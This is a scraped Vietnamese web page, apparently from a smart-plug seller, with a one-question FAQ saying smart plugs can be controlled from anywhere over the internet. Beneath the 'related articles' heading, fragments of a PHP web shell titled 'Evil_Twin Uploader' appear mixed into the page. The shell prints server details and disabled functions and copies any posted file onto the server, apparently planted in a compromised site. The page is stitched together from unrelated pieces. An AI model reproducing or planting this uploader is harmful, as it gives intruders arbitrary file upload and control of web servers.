Evil_Twin Uploader

Ổ cắm thông minh chỉ có thể được điều khiển khi bạn ở nhà?

Không, bạn có thể điều khiển ổ cắm thông minh ở bất kỳ đâu có chỉ cần chiếc điện thoại thông minh của bạn có kết nối internet.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial